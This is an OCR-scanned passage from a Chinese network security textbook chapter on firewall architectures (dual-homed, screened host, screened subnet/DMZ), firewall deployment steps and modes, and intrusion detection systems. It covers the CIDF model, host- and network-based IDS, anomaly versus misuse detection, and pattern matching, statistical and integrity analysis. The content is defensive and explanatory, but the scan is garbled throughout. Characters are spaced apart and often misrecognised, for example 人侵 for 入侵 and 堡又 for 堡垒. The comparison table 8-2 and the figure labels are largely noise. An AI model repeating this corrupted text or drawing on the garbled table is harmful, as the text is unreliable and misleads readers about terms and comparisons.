条 件 、 管 理 日 志 、 进 站 代理 ,FTP 代理 .出 站 代理 .邮件 服务 器 和 域名 服务 器 等 。 告 警 功能 会 
守住 每 一 个 TCP 或 UDP 探寻 ,并 能 以 发 出 邮件 .声响 等 多 种 方式 报警 。 此 外 ,新 一 代 防 火 
墙 还 在 网 络 诊断 ,数据 备份 与 保全 等 方面 具有 特色 。 


8.2 防火 墙 防御 体系 结构 


目前 ,防火 墙 的 防御 体系 结构 主要 有 双 宿 /多 宿主 机 防火 墙 `. 屏 项 主机 防火 墙 和 屏蔽 子 
网 防火 墙 三 种 。 


8.2.1 双 宿 /多 宿主 机 防火 墙 


双 宿 /多 宿主 机 防火 墙 (Dual-Homed/Multi-Homed Firewall) 又 称 为 双 宿 /多 宿 网 关 防 
火 墙 。 它 是 一 种 拥有 两 个 或 多 个 连接 到 不 同 网 络 上 的 网 络 接口 的 防火 墙 ,通常 用 一 台 装 有 
两 块 或 多 块 网 卡 的 堡垒 主机 作为 防火 墙 ,两 块 或 多 块 网 卡 各 自 与 受 保护 网 和 外 部 网 相连 ,其 
体系 结构 如 图 8-3 所 示 。 这 里 的 堡垒 主机 是 一 种 被 强化 的 可 以 防御 攻击 的 计算 机 ,被 暴露 
于 因特网 之 上 ,作为 进入 内 部 网 络 的 一 个 检查 点 ,以 达到 把 整个 网 络 的 安全 问题 集中 在 某 个 
主机 上 解决 ,从 而 省 时 省 力 , 不 用 考虑 其 他 主机 的 安全 的 目的 。 可 以 看 出 ,堡垒 主机 是 网 络 中 
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最 容易 受到 侵害 的 主机 ,所 以 堡垒 主 机 也 必须 是 自身 保护 最 完善 的 主机 。 
工作 站 工作 站 ”服务 器 | 六 过 
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图 8-3 双 宿 /多 宿主 机 防火 墙 体系 结构 


双 宿 /多 宿主 机 防火 墙 的 特点 是 主机 的 路 由 功能 是 被 禁止 的 ,两 个 网 络 之 间 的 通信 通过 
应 用 层 代理 服务 来 完成 。 堡 又 主机 的 系统 软件 可 用 于 维护 系统 日 志 、 硬 件 备份 日 志 或 远程 
日 志 。 这 对 于 日 后 的 检查 非常 有 用 ,但 这 不 能 帮助 网 络 管理 者 确认 内 网 中 哪些 主机 可 能 已 
被 黑客 和 人 侵 , 一 旦 人 侵 者 侵入 堡垒 主机 并 使 其 只 具有 路 由 功能 , 则 任何 网 上 用 户 均 可 以 随便 
访问 内 部 网 络 。 


8.2.2 屏蔽 主机 防火 墙 


屏蔽 主机 防火 墙 易于 实现 也 很 安全 ,因此 应 用 广泛 。 如 图 8-4 所 示 , 屏 项 主机 网 关 包 括 
一 个 分 组 过 滤 路 由 器 连接 外 部 网 络 ,同时 一 个 堡 令 主 机 安装 在 内 部 网 络 上 ,通常 在 路 由 器 上 
设立 过 滤 规 则 ,并 使 这 个 堡垒 主机 成 为 从 外 部 网 络 唯一 可 直接 到 达 的 主机 ,这 确保 了 内 部 网 
络 不 受 未 被 授权 的 外 部 用 户 的 攻击 。 


[ 作 站 工作 站 。 服务 器 愤 项 主机 路 由 器 
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图 8-4 屏蔽 主机 防火 墙 体系 结构 


在 屏蔽 的 路 由 器 上 的 数据 包 过 滤 是 按 这 样 一 种 方法 设置 的 : 堡垒 主机 是 因特网 上 的 主 
机 能 连接 到 内 部 网 络 上 的 系统 的 桥梁 (例如 ,传送 进来 的 电子 邮件 )。 即 使 这 样 ,也 仅 有 某 些 
确定 类 型 的 连接 被 允许 。 任 何 外 部 的 系统 试图 访问 内 部 的 系统 或 服务 将 必须 连接 到 这 人 台 保 
全 主机 上 。 因 此 , 保 又 主机 需要 拥有 高 等 级 的 安全 性 。 

数据 包 过 滤 也 允许 堡垒 主机 开放 可 允许 的 连接 (对 于 “可 允许 ”的 界定 将 由 用 户 站 点 的 
安全 策略 决定 ) 到 外 部 世界 。 在 屏蔽 的 路 由 器 中 数据 包 过 滤 配 置 可 以 按 下 列 方式 之 一 执行 。 

(1) 允许 其 他 的 内 部 主机 为 了 某 些 服 务 与 因特网 上 的 主机 连接 ( 即 允 许 那 些 已 经 有 数 
据 包 过 滤 的 服务 ) 。 

(2) 不 允许 来 自 内 部 主机 的 所 有 连接 (强迫 那些 主机 经 由 堡垒 主机 使 用 代理 服务 ) 。 

用 户 可 以 针对 不 同 的 服务 混合 使 用 这 些 手段 , 某 些 服务 可 以 被 允许 直接 经 由 数据 包 过 
滤 , 而 其 他 服务 可 以 被 允许 仅 间 接地 经 过 代理 。 这 完全 取决 于 用 户 实行 的 安全 策略 。 如 果 
受 保护 网 络 是 一 个 虚拟 扩展 的 本 地 网 , 即 没有 子 网 和 路 由 器 ,那么 内 网 的 变化 不 影响 堡垒 主 
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机 和 屏蔽 路 由 器 的 配置 。 危 险 区 域 只 限制 在 堡垒 主机 和 屏蔽 路 由 器 。 网 关 的 基本 控制 策略 
由 安装 在 上 面 的 软件 决定 。 如 果 攻 击 者 设法 登录 到 网 关上 面 ,内 网 中 的 其 余 主 机 就 会 受到 
很 大 威胁 。 这 与 双 宿 主机 防火 墙 受 攻击 时 的 情形 相似 。 


8.2.3 屏蔽 子 网 防火 墙 


这 种 类 型 的 防火 墙 是 在 内 部 网 络 和 外 部 网 络 之 间 建 立 一 个 被 隔离 的 子 网 ,用 两 台 分 组 
过 滤 路 由 器 将 这 一 子 网 分 别 与 内 部 网 络 和 外 部 网 络 分 开 。 在 很 多 实现 过 程 中 ,两 个 分 组 过 
滤 路 由 器 放 在 子 网 的 两 端 ,在 子 网 内 构成 一 个 “ 非 军事 区 (DeMilitarized Zone, DMZ)”, 如 
图 8-5 所 示 。 
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图 8-5 屏蔽 子 网 防火 墙 体系 结构 


内 部 网 络 和 外 部 网 络 均 可 访问 被 屏蔽 子 网 ,但 禁止 它们 穿 过 被 屏蔽 子 网 通信 ,例如 
WWW 和 FTP 服务 器 可 放 在 DMZ 中 。 有 的 屏蔽 子 网 中 还 设 有 一 台 堡 又 主机 作为 唯一 可 
访问 点 ,支持 终端 交互 或 作为 应 用 网 关 代 理 。 这 种 配置 的 危险 带 仅 包 括 保 又 主机 、 子 网 主机 
及 所 有 连接 内 网 、 外 网 和 屏蔽 子 网 的 路 由 器 。 

在 实际 应 用 中 建造 防火 墙 时 ,一 般 很 少 采 用 单一 的 技术 ,通常 采用 多 种 解决 不 同 问题 的 
技术 的 组 合 。 这 种 组 合 主要 取决 于 向 用 户 提供 什么 样 的 服务 ,能 接受 什么 等 级 的 风险 。 采 
用 哪 种 技术 主要 取决 于 经 费 、 投 资 的 大 小 或 技术 人 员 的 技术 、 时 间 等 因素 。 应 该 根据 所 购买 
防火 墙 软件 的 要 求 ,硬件 环境 所 能 提供 的 支持 ,综合 考虑 选用 最 合适 的 防火 墙 体系 结构 ,最 
大 限度 地 发 挥 防火 墙 软件 的 功能 ,实现 对 信息 的 安全 保护 。 


8.3 防火墙 部 团 过 程 和 典型 部 署 模式 


8.3.1 部 署 防火 墙 的 基本 方法 和 步骤 


防火 墙 部 署 是 指 根 据 受 保护 的 网 络 环境 和 安全 策略 ,如 物理 结构 或 逻辑 区 域 ,将 防火 墙 
安装 在 网 络 系统 中 的 过 程 。 防 火 墙 部 署 的 基本 过 程 包含 以 下 几 个 步骤 。 

步骤 一 ,根据 公司 或 组 织 的 安全 策略 需求 ,将 网 络 划 分 为 若干 安全 区 域 。 

步骤 二 ,在 安全 区 域 之 间 设 置 针对 网 络 通信 的 访问 控制 点 。 

步骤 三 ,针对 不 同 访问 控制 点 的 通信 业务 需求 ,制定 相应 的 边界 安全 策略 。 

步骤 四 ,根据 控制 点 的 边界 安全 策略 ,采用 合适 的 防火 墙 技术 和 防范 结构 。 

步骤 五 ,在 防火 墙 上 ,配置 实现 对 应 的 边界 安全 策略 。 

步骤 六 ,测试 验证 边界 安全 策略 是 否 正 常 执行 。 
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步骤 七 ,运行 和 维护 防火 墙 。 
8.3.2 防火墙 典型 部 署 模式 


模式 一 : 在 企业 、 政 府 纵 向 网 络 中 部 署 防火 墙 

在 政府 机 构 、 大 中 型 企业 中 ,总 部 网 络 与 分 支 机构 网 络 相 互 连 接 是 纵向 关系 。 为 节省 网 
络 建设 成 本 ,会 利用 互联 网 建立 跨 地 区 的 企业 网 络 系统 。 在 这 种 纵向 网 络 结构 中 ,每 一 个 分 
支 网 络 的 关键 位 置 都 部 署 了 防火 墙 , 从 而 确保 网 络 数据 的 安全 可 靠 , 如 图 8-6 所 示 。 


图 8-6 ”纵向 网 络 中 部 署 防火 墙 
模式 二 : 内 部 网 络 安全 防御 
随 着 信息 化 的 进展 ,内 部 网 络 与 互联 网 之 间 信 息 交 换 日 益 频繁 ,为 了 保护 内 部 网 络 的 安 
全 性 ,安全 管理 人 员 在 内 部 网 络 与 互联 网 边界 部 署 防火 墙 , 防 止 外 部 网 络 攻 击 。 目 前 ,典型 
安全 边界 模式 是 屏蔽 子 网 防火 墙 , 如 图 8-7 所 示 。 


图 8-7 内 部 网 络 安全 防御 防火 墙 部 署 


模式 三 : 高 可 靠 性 网 络 中 防火 墙 部 署 

大 型 网 络 对 可 靠 性 的 要 求 很 高 ,如 图 8-8 所 示 ,在 一 个 全 宛 余 环 境 中 ,将 防火 墙 以 透明 
模式 接 入 ,为 防止 网 络 中 不 正常 的 路 由 .防火 墙 之 间 采 用 STP 线 连接 ,保持 防火 墙 的 状态 表 
同步 ,同时 通过 Cisco 的 HSRP 技术 和 浮动 静态 路 由 技术 来 实现 元 余 备份 。 
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图 8-8 高 可 靠 性 网 络 中 防火 墙 的 部 署 


8.4 ”人 侵 检 测 技术 


入 侵 检 测 是 一 种 主动 保护 自己 免 受 攻击 的 网 络 安全 技术 。 作 为 防火 墙 的 合理 补充 ,入 
侵 检 测 技术 能 够 帮助 系统 对 付 网 络 攻 击 ,扩展 了 系统 管理 员 的 安全 能 力 , 包 括 安全 审计 、 监 
视 攻击 识别 和 响应 ,提高 了 信息 安全 基础 结构 的 完整 性 。 入 侵 检测 被 认为 是 防火 墙 之 后 的 
第 二 道 安全 闸门 ,在 不 影响 网 络 性 能 的 情况 下 能 对 网 络 进行 检测 。 


8.4.1 入 侵 检测 系统 概述 


1. 入 侵 检测 基本 概念 

1) 入 侵 和 入 侵 检测 

入侵 (Intrusion) 是 指 任何 试图 危害 资源 的 完整 性 、 可 信和 度 和 可 获取 性 的 动作 。 

入 侵 检测 (Intrusion Detection) 是 对 入 侵 行为 的 检测 。 即 发 现 或 确定 入 侵 行 为 存在 或 
出 现 的 动作 。 也 就 是 发 现 、 跟 踪 并 记录 计算 机 系统 或 计算 机 网 络 中 的 非 授权 行为 ,或 发 现 并 
调查 系统 中 可 能 为 试图 入 侵 或 病毒 感染 所 带 来 的 异常 活动 。 

入 侵 检测 作为 一 种 积极 主动 的 安全 防御 技术 ,提供 了 对 内 部 攻击 、 外 部 攻击 和 误 操 作 的 
实时 保护 ,在 网 络 系统 受到 危害 之 前 拦截 和 响应 入 侵 。 入 侵 检 测 通 过 执行 以 下 任务 来 实现 : 
监视 ,分析 用 户 及 系统 活动 ; 系统 构造 和 弱点 的 审计 ; 识别 反映 已 知 进攻 的 活动 模式 并 向 
相关 人 士 报警 ; 异常 行为 模式 的 统计 分 析 ; 评估 重要 系统 和 数据 文件 的 完整 性 ; 操作 系统 
的 审计 跟踪 管理 ,并 识别 用 户 违反 安全 策略 的 行为 。 

2) 入 侵 检 测 系统 

入 侵 检 测 系 统 (Intrusion Detective System,IDS) 是 从 计算 机 网 络 中 的 若干 关键 点 收集 
信息 ,并 分 析 这 些 信息 ,检测 网 络 中 是 否 有 违反 安全 策略 的 行为 和 遭 到 袭击 的 迹象 。 将 入 侵 
检测 的 软件 与 硬件 进行 组 合 便 是 入 侵 检测 系统 。 它 是 一 种 对 网 络 传输 进行 即时 监视 ,在 发 


第 8 章 防火 墙 与 入 侵 检 测 技术 209 


现 可 疑 传输 时 发 出 警报 或 者 采取 主动 反应 措施 的 网 络 安 全 设备 。 与 其 他 网 络 安 全 设备 的 不 
同 之 处 在 于 ,IDS 采用 积极 主动 的 安全 防御 技术 。 

在 允许 各 种 网 络 资 源 以 开放 方式 运作 的 前 提 下 ,入 侵 检测 系统 成 了 确保 网 络 安全 的 一 
种 新 的 手段 , 它 通过 实时 的 分 析 、 检 查 特 定 的 攻击 模式 .系统 配置 .系统 漏洞 ,存在 缺陷 的 程 
序 以 及 系统 或 用 户 的 行为 模式 ,监控 与 安全 有 关 的 活动 。 

2. 通用 入 侵 检 测 模型 

通用 入 侵 检 测 模型 (Common Intrusion Detection Framework ,CIDF) ,阐述 了 一 个 标准 
的 IDS 的 通用 工作 原理 模型 。CIDF 将 IDS 需要 分 析 的 数据 统称 为 事件 (event), 它 可 以 是 
基于 网 络 的 IDS 从 网 络 中 提取 的 数据 包 ,也 可 以 是 基于 主机 的 IDS 从 系统 日 志 等 其 他 途径 
得 到 的 数据 信息 。CIDF 将 一 个 人 侵 检测 系统 分 为 以 下 组 件 。 

事件 产生 器 (Event Generators) 。 事 件 产生 器 的 任务 是 从 人 侵 检测 系统 外 的 整个 计算 
环境 中 获得 事件 ,并 将 这 些 事件 转化 成 CIDF 的 GIDO( 统 一 入 侵 检测 对 象 ) 格 式 传送 给 其 他 
组 件 。 事 件 产生 器 是 所 有 IDS 所 需要 的 ,同时 也 是 可 以 重用 的 。 

事件 分 析 器 (Event Analyzers) 。 从 其 他 组 件 接收 GIDO, 分 析 得 到 的 数据 ,并 产生 新 的 
GIDO 再 传送 给 其 他 组 件 。 例 如 ,分析 器 可 以 是 一 个 轮廓 描述 工具 ,统计 性 地 检查 现在 的 事 
件 是 否 可 能 与 以 前 某 个 事件 来 自 同一 个 时 间 序 列 ; 也 可 以 是 一 个 特征 检测 工具 ,用 于 在 一 
个 事件 序列 中 检查 是 否 有 已 知 的 滥用 攻击 特征 ; 此 外 ,事件 分 析 器 还 可 以 是 一 个 相关 器 , 观 
察 事件 之 间 的 关系 ,将 有 联系 的 事件 放 在 一 起 ,以 利于 以 后 的 进一步 分 析 。 

响应 单元 (Response Units)。 是 对 分 析 结 果 做 出 反应 的 功能 单元 , 它 可 以 终止 进程 、 重 
置 连接 改变 文件 属性 等 ,也 可 以 只 是 简单 的 报警 。 

事件 数据 库 (Event Databases) 。 是 存放 各 种 中 间 和 最 终 数 据 的 地 方 的 统称 , 它 可 以 是 
复杂 的 数据 库 , 也 可 以 是 简单 的 文本 文件 。 通 用 入 侵 检测 模型 如 图 8-9 所 示 。 


= 一 | 响应 单元 | 输出 : 反应 或 事件 
1 | 
! 输 出 ; 高 级 中 断 操作 1 输出 : 事件 的 存储 信息 
事件 分 析 器 | 。 ----- 全 = 一 | 事件 数据 库 
1 
| ! 输 出 ， 原始 或 低级 事件 | 
1 二 事件 产生 器 | ------- 一 
4 输入 : 原始 事件 源 
计算 机 网 络 


8-9 ”通用 入 侵 检 测 模型 


3. 入 食 检 测 系统 的 功能 

入 侵 检测 系统 的 功能 有 以 下 几 个 方面 。 

(1) 监视 用 户 和 系统 的 运行 情况 ,查找 非法 用 户 和 合法 用 户 的 越权 操作 。 

(2) 检测 系统 配置 的 正确 性 和 安全 漏洞 ,并 提示 管理 员 修 补漏 洞 。 

(3) 对 用 户 的 非 正常 活动 进行 统计 分 析 ,发 现 人 侵 行为 的 规律 。 

(4) 检查 系统 程序 和 数据 的 一 致 性 和 正确 性 。 

(5) 通过 检测 和 记录 网 络 中 的 安全 违规 行为 ,惩罚 网 络 犯罪 ,防止 网 络 入侵 事件 发 生 。 
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(6) 评估 系统 关键 资源 和 数据 文件 的 完整 性 。 
(7) 识别 已 知 的 攻击 行为 和 统计 分 析 异 常 行为 。 
(8) 操作 系统 日 志 管 理 , 并 识别 违反 安全 策略 的 用 户 活动 。 


8.4.2 入 侵 检测 系统 的 分 类 


1. 基于 数据 源 的 分 类 


入 侵 检测 系统 首先 要 解决 的 问题 是 数据 源 。 和 侵 检测 系统 根据 其 检查 数据 的 来 源 可 分 
为 三 类 : 基于 主机 的 入 侵 检测 系统 ,基于 网 络 的 人 侵 检 测 系统 和 混合 型 人 侵 检 测 系统 。 

1) 基于 主机 的 入侵 检测 系统 

基于 主机 的 和 人 侵 检测 系统 的 检测 目标 是 主机 系统 和 系统 本 地 用 户 ,原理 是 根据 主机 的 
审计 数据 和 系统 日 志 发 现 可 疑 事件 。 主 机 型 入 侵 检测 系统 通常 运行 在 被 检测 的 主机 或 服务 
器 上 ,实时 检测 主机 安全 性 方面 的 数据 ,诸如 计算 机 操作 系统 的 事件 日 志 、 应 用 程序 的 事件 
日 志 、 系 统 调 用 、 端 口 调用 和 安全 审计 记录 等 ,其 效果 依赖 于 数据 的 准确 性 以 及 安全 事件 的 
定义 。 可 见 这 种 类 型 的 IDS 是 利用 主机 操作 系统 及 应 用 程序 的 审核 踪迹 作为 输入 的 主要 
数据 来 源 来 检测 人 侵 。 基 于 主机 的 人 侵 检测 系统 被 设计 成 检测 IDS 代理 所 驻 留 的 宿主 机 ， 
可 以 检测 到 网 络 协议 的 高 层 数 据 , 也 可 检测 到 被 监视 主机 上 的 本 地 活动 。 

2) 基于 网 络 的 入侵 检测 系统 

基于 网 络 的 入侵 检测 系统 捕获 并 分 析 网 络 上 的 数据 包 , 包 括 分 析 其 是 否 具有 已 知 的 攻 
击 模式 ,以 此 来 判别 是 否 为 人 侵 者 。 网 络 型 入侵 检 测 系统 担负 着 保护 整个 网 段 的 任务 ,基于 
网 络 的 入侵 检测 系统 由 遍及 网 络 的 传感器 (sensor) 组 成 ,传感器 是 一 台 将 以 太 网 卡 置 于 混 
杂 模 式 的 计算 机 ,用 于 嗅 探 网 络 上 的 数据 包 。 当 该 模型 发 现 某 些 可 疑 的 现象 时 也 一 样 会 产 
生 告 警 ,并 会 向 一 个 中 心 管理 站 点 发 出 “告警 ”信号 。 

表 8-2 比较 了 基于 主机 的 入 侵 检 测 系统 与 基于 网 络 的 入 侵 检 测 系 统 的 优 缺 点 。 

表 8-2 两 种 入 侵 检 测 系统 的 比较 


系统 类 型 优点 二 
加 由 和 特定 的 系统 ae 
多 P 
ke @ 发 现 网 络 IDS 无 法 发 现 的 攻击 Sm 
@ 不 需要 额外 的 硬件 


@ 入门 成 本 低 @@ 需要 适应 不 同 的 操作 系统 


Q@ 发 现 主机 IDS 无 法 发 现 的 攻击 
@ 攻击 者 很 难 毁 灭 证 据 


Q@ 不 能 处 理 加 密 通信 


基于 网 络 的 人 侵 检 @ 较 难处 理 高 速 网 络 
@ 快速 监测 和 响应 : 

| 图 能 够 监测 到 失败 的 攻击 行为 和 恶意 行为 人 
@ 独立 于 操作 系统 


这 两 种 系统 模型 具有 互补 性 ,基于 网 络 的 入侵 检测 系统 能 够 客观 地 反映 网 络 活动 ,特别 
是 能 够 监视 到 主机 系统 审计 的 盲区 ; 而 基于 主机 的 入 侵 检测 系统 能 够 更 加 精确 地 监视 主机 
中 的 各 种 活动 。 基 于 网 络 的 人 侵 检 测 系统 受 交换 网 的 限制 ,只 能 监控 同一 监控 点 的 主机 ,而 
基于 主机 的 人 侵 检 测 系统 装 有 IDS 的 监控 主机 ,可 以 对 同一 监控 点 内 的 所 有 主机 进行 
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监控 。 

3) 混合 型 人 侵 检测 系统 

综合 了 上 述 两 种 人 侵 检测 系统 的 特点 , 既 可 以 发 现 网 络 中 的 攻击 信息 ,也 可 以 从 系统 日 
志 中 发 现 异 常情 况 。 

2. 基于 检测 技术 的 分 类 

从 采用 检测 技术 的 不 同 可 将 入 侵 检测 系统 分 为 异常 检测 (Anomaly Detection) 模 型 和 
误 用 检测 (Misuse Detection) 模 型 两 种 。 

1) 异常 检测 模型 

根据 使 用 者 的 行为 或 资源 使 用 状况 的 正常 程度 来 判断 是 否 入侵 ,而 不 依赖 于 具体 行为 
是 否 出 现 异常 来 检测 。 异 常 检 测 与 系统 相对 无 关 , 通 用 性 较 强 。 但 由 于 不 可 能 对 整个 系统 
内 的 所 有 用 户 行为 进行 全 面 的 描述 ,而 且 每 个 用 户 的 行为 是 经 常 改变 的 ,所 以 它 的 主要 缺陷 
在 于 误 检 率 很 高 ,尤其 在 用 户 数 据 众 多 ,或 工作 方式 经 常 改变 的 环境 中 。 

2) 误 用 检测 模型 

根据 已 定义 好 的 入 侵 模式 ,通过 判断 在 实际 的 安全 和 审计 数据 中 是 否 出 现 这 种 入 侵 模 式 
来 完成 检测 功能 。 这 种 方法 由 于 依据 具体 特征 库 进行 判断 ,所 以 检测 准确 度 很 高 ,并 且 因 为 
检测 结果 有 明确 的 参照 ,也 为 系统 管理 员 及 时 做 出 相应 措施 提供 了 方便 。 误 用 检测 的 主要 
缺陷 在 于 检测 范围 受 已 有 知识 的 局 限 ,无 法 检测 未 知 的 攻击 类 型 。 另 外 ,检测 系统 对 目标 的 
依赖 性 太 强 , 不 但 系统 移植 性 不 好 ,维护 工作 量 大 ,而 且 将 具体 入 侵 手 段 抽象 成 知识 也 是 比 
较 困 难 的 。 

异常 检测 和 误 用 检测 各 有 优势 ,又 互 有 不 足 。 在 实际 系统 中 ,可 考虑 将 两 者 结合 起 来 使 
用 ,如 将 异常 检测 用 于 系统 日 志 分 析 , 将 误 用 检测 用 于 网 络 数 据 包 的 检测 ,这 种 方式 是 目前 
比较 通用 的 方法 。 

3. 基于 工作 方式 

入 侵 检测 系统 根据 工作 方式 分 为 离线 检测 系统 和 在 线 检测 系统 。 

1) 离线 检测 系统 

离线 检测 系统 是 非 实时 工作 的 系统 , 它 在 事后 分 析 审 计 事 件 , 从 中 检查 入 侵 活动 。 事 后 
人 入侵 检测 由 网 络 管理 人 员 进 行 ,他 们 具有 网 络 安全 的 专业 知识 ,根据 计算 机 系统 对 用 户 操作 
所 做 的 历史 审计 记录 判断 是 否 存在 入侵 行为 ,如 果 有 就 断 开 连接 ,并 记录 入 侵 证 据 和 进行 数 
据 恢 复 。 事 后 人 侵 检测 是 管理 员 定 期 或 不 定期 进行 的 ,不 具有 实时 性 。 

2) 在 线 检测 系统 

在 线 检测 系统 是 实时 联机 的 检测 系统 , 它 包 含 对 实时 网 络 数据 包 分 析 和 实时 主机 审计 
分 析 。 其 工作 过 程 是 实时 入侵 检 测 在 网 络 连接 过 程 中 进行 ,系统 根据 用 户 的 历史 行为 模型 、 
存储 在 计算 机 中 的 专家 知识 以 及 神经 网 络 模型 对 用 户 当 前 的 操作 进行 判断 ,一 旦 发 现 入 侵 
迹象 立即 断 开 入 侵 者 与 主机 的 连接 ,并 收集 证 据 和 实施 数据 恢复 。 这 个 检测 过 程 是 不 断 循 
环 进行 的 。 


8.4.3 入 侵 检 测 的 过 程 
入侵 检测 过 程 分 为 三 部 分 : 信息 收集 、 信 息 分 析 和 结果 处 理 。 


212 网 络 安全 教程 及 实践 


1. 信息 收集 

入侵 检测 的 第 一 步 是 信息 收集 ,收集 内 容 包 括 系 统 、 网 络 、 数 据 及 用 户 活动 的 状态 和 行 
为 。 由 放置 在 不 同 网 段 的 传感器 或 不 同 主机 的 代理 来 收集 信息 ,包括 系统 和 网 络 日 志文 件 、 
网 络 流量 、 非 正常 的 目录 和 文件 改变 、 非 正常 的 程序 执行 。 

入 侵 检 测 利用 的 信息 一 般 来 自 以 下 4 个 方面 。 

1) 系统 和 网 络 日 志文 件 

日 志文 件 中 记录 了 各 种 行为 类 型 ,每 种 类 型 又 包含 不 同 的 信息 ,通过 查看 日 志文 件 ,能 
够 发 现成 功 的 入 侵 或 入 侵 企图 ,并 很 快 地 启动 相应 的 应 急 响 应 程序 。 

2) 目录 和 文件 中 的 不 期 望 的 改变 

目录 和 文件 中 的 不 期 望 的 改变 (包括 修改 .创建 和 删除 ) ,特别 是 那些 正常 情况 下 限制 访 
问 的 ,很 可 能 就 是 一 种 入 侵 产 生 的 指示 和 信号 。 黑 客 经 常 替换 ,修改 和 破坏 他 们 获得 访问 权 
的 系统 上 的 文件 ,同时 为 了 隐藏 系统 中 他 们 的 表现 及 活动 痕迹 ,都 会 尽力 去 替换 系统 程序 或 
修改 系统 日 志文 件 。 

3) 程序 执行 中 的 不 期 望 行为 

若 系统 中 的 一 个 进程 出 现 了 不 期 望 的 行为 可 能 表明 黑客 正在 入 侵 系 统 。 黑 客 可 能 会 将 
程序 或 服务 的 运行 分 解 , 从 而 导致 它 失败 ,或 者 是 以 非 用 户 或 管理 员 意 图 的 方式 操作 。 

4) 物理 形式 的 入 侵 信息 

这 包括 两 个 方面 的 内 容 ,一 是 未 授权 的 对 网 络 硬 件 连接 ; 二 是 对 物理 资源 的 未 授权 访问 。 

2. 信息 分 析 

上 述 4 类 收集 到 的 有 关系 统 、 网 络 .数据 及 用 户 活 动 的 状态 和 行为 等 信息 ,被 送 到 检测 
引擎 ,检测 引擎 驻 留 在 传感器 中 ,一般 通过 三 种 技术 手段 进行 分 析 : 模式 匹配 、 统 计 分 析 和 
完整 性 分 析 。 其 中 前 两 种 方法 用 于 实时 的 入 侵 检测 ,而 完整 性 分 析 则 用 于 事后 分 析 。 

1) 模式 匹配 

模式 匹配 就 是 将 收集 到 的 信息 与 已 知 的 网 络 入 侵 和 系统 误 用 模式 数据 库 进行 比较 ,从 
而 发 现 违背 安全 策略 的 行为 。 该 方法 的 一 大 优点 是 只 需 收 集 相关 的 数据 集合 ,显著 减少 系 
统 负担 , 且 技 术 已 相当 成 熟 。 它 的 检测 准确 度 和 效率 都 很 高 。 但 是 ,该 方法 存在 的 弱点 是 需 
要 不 断 的 升级 以 对 付 不 断 出 现 的 黑客 攻击 手法 ,不 能 检测 到 从 未 出 现 过 的 黑客 攻击 手段 。 

2) 统计 分 析 

统计 分 析 方 法 是 首先 给 系统 对 象 ( 如 用 户 .文件 .目录 和 设备 等 ) 创 建 一 个 统计 描述 , 统 
计 正 常 使 用 时 的 一 些 测量 属性 (如 访问 次 数 、 操 作 失败 次 数 和 延 时 等 )。 测 量 属性 的 平均 值 
将 被 用 来 与 网 络 、 系 统 的 行为 进行 比较 ,任何 观察 值 在 正常 值 范 围 之 外 时 ,就 认为 有 入 侵 发 
生 。 其 优点 是 可 检测 到 未 知 的 入侵 和 更 为 复杂 的 入 侵 ,缺点 是 误 报 、 漏 报 率 高 , 且 不 适应 用 
户 正常 行为 的 突然 改变 。 

3) 完整 性 分 析 

完整 性 分 析 主 要 关注 某 个 文件 或 对 象 是 否 被 更 改 , 这 经 常 包括 文件 和 目录 的 内 容 及 属 
性 , 它 在 发 现 被 更 改 的 应 用 程序 方面 特别 有 效 。 完 整 性 分 析 利 用 强 有 力 的 加 密 机 制 , 称 为 消 
息 摘要 函数 (例如 MD5), 它 能 识别 哪怕 是 微小 的 变化 。 其 优点 是 不 管 模式 匹配 方法 和 统计 
分 析 方 法 能 否 发 现 入 侵 , 只 要 是 成 功 的 攻击 导致 了 文件 或 其 他 对 象 的 任何 改变 , 它 都 能 够 发 
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现 。 缺 点 是 一 般 以 批 处 理 方式 实现 ,不 用 于 实时 响应 。 尽 管 如 此 ,完整 性 检测 方法 还 应 该 是 
网 络 安全 产品 的 必要 手段 之 一 。 

3. 结果 处 理 

控制 台 按 照 告警 产生 预先 定义 的 响应 采取 相应 措施 ,可 以 是 重新 配置 路 由 器 或 防火 墙 、 
终止 进程 ,切断 连接 、 改 变 文件 属性 ,也 可 以 只 是 简单 的 告警 。 


8.5 人 侵 检测 的 方法 


常用 的 入 侵 检测 方法 有 三 种 ,分 别 是 静态 配置 分 析 、 异 常 性 检测 方法 和 基于 行为 的 检测 
方法 。 

1. 静态 配置 分 析 

静态 配置 分 析 通 过 检查 系统 的 当前 配置 ,诸如 系统 文件 的 内 容 或 者 系统 表 , 来 检查 系统 
是 否 已 经 或 者 可 能 会 遭 到 破坏 。 项 态 是 指 检查 系统 的 静态 特征 (系统 配置 信息 ) ,而 不 是 系 
统 中 的 活动 。 

采用 静态 分 析 方 法 主要 有 以 下 几 方 面 的 原因 : 入 侵 者 对 系统 攻击 时 可 能 会 留 下 痕迹 ， 
这 可 通过 检查 系统 的 状态 检测 出 来 ; 系统 管理 员 以 及 用 户 在 建立 系统 时 难免 会 出 现 一 些 错 
误 或 遗漏 一 些 系统 的 安全 性 措施 ; 另外 ,系统 在 遭受 攻击 后 ,入 侵 者 可 能 会 在 系统 中 安装 一 
些 安全 性 后 门 以 方便 对 系统 进行 进一步 的 攻击 。 

所 以 ,静态 配置 分 析 方 法 需要 尽 可 能 了 解 系统 的 缺陷 ,否则 入 侵 者 只 需要 简单 地 利用 那 
些 系统 中 未 知 的 安全 缺陷 就 可 以 避 开 检测 系统 。 

2. 异常 性 检测 方法 

异常 性 检测 技术 是 一 种 在 不 需要 操作 系统 及 其 防范 安全 性 缺陷 专门 知识 的 情况 下 ,就 
可 以 检测 入 侵 者 的 方法 ,同时 它 也 是 检测 冒充 合法 用 户 的 入 侵 者 的 有 效 方 法 。 但 是 ,在 许多 
环境 中 ,为 用 户 建立 正常 行为 模式 的 特征 轮廓 以 及 对 用 户 活动 的 异常 性 进行 报警 的 门限 值 
的 确定 都 是 比较 困难 的 事 , 所 以 仅 使 用 异常 性 检测 技术 不 可 能 检测 出 所 有 的 入 侵 行为 。 

目前 这 类 入 侵 检 测 系统 多 采用 统计 或 者 基于 规则 描述 的 方法 建立 系统 主体 的 行为 特征 
轮廓 。 

(1) 统计 性 特征 轮廓 由 主体 特征 变量 的 频 度 、 均 值 以 及 偏差 等 统计 量 来 描述 ,如 SRI 的 
下 一 代 实 时 入 侵 检 测 专 家 系统 ,这 种 方法 对 特洛伊 木马 以 及 欺骗 性 的 应 用 程序 的 检测 非常 
有 效 。 

(2) 基于 规则 描述 的 特征 轮廓 由 一 组 用 于 描述 主体 每 个 特征 的 合法 取 值 范围 与 其 他 特 
征 的 取 值 之 间 关 系 的 规则 组 成 (如 TIM) 。 该 方案 还 可 以 采用 从 大 型 数据 库 中 提取 规则 的 
